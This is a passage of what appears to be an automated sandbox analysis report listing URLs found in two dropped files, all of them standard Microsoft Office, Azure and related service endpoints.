        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://analysis.windows.net/powerbi/api
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.aadrm.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.aadrm.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.addins.omex.office.net/api/addins/search
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.addins.store.office.com/app/query
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.cortana.ai
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.diagnostics.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.diagnosticssdf.office.com
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.microsoftstream.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.microsoftstream.com/api/
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.office.net
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.officescripts.microsoftusercontent.com/api
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.onedrive.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://api.scheduler.
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://apis.live.net/v5.0/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://arc.msn.com/v4/api/selection
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://augloop.office.com
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://augloop.office.com/v2
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://autodiscover-s.outlook.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designer-mobile
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://cdn.entity.
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://cdn.hubblecontent.osi.office.net/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://cdn.int.designerapp.osi.office.net/fonts
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://clients.config.office.net
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://clients.config.office.net/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://config.edge.skype.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://cortana.ai
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://cortana.ai/api
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://cr.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://d.docs.live.net
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://dataservice.o365filtering.com
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://dataservice.o365filtering.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://designerapp.officeapps.live.com/designerapp
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://dev.cortana.ai
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://devnull.onenote.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://directory.services.
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ecs.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ecs.office.com/config/v1/Designer
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ecs.office.com/config/v2/Office
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601652342626
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://entitlement.diagnostics.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://fpastorage.cdn.office.net/%s
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xml
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://globaldisco.crm.dynamics.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://graph.ppe.windows.net
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://graph.ppe.windows.net/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://graph.windows.net
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://graph.windows.net/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://incidents.diagnostics.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://inclient.store.office.com/gyro/client
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://invites.office.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://lifecycle.office.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://login.microsoftonline.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://login.microsoftonline.com/
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://login.windows.local
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
        Source: E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://make.powerautomate.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://management.azure.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://management.azure.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://messaging.action.office.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://messaging.engagement.office.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://messaging.lifecycle.office.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://messaging.office.com/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://my.microsoftpersonalcontent.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ncus.contentsync.
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ncus.pagecontentsync.
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://officeapps.live.com
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://officeci.azurewebsites.net/api/
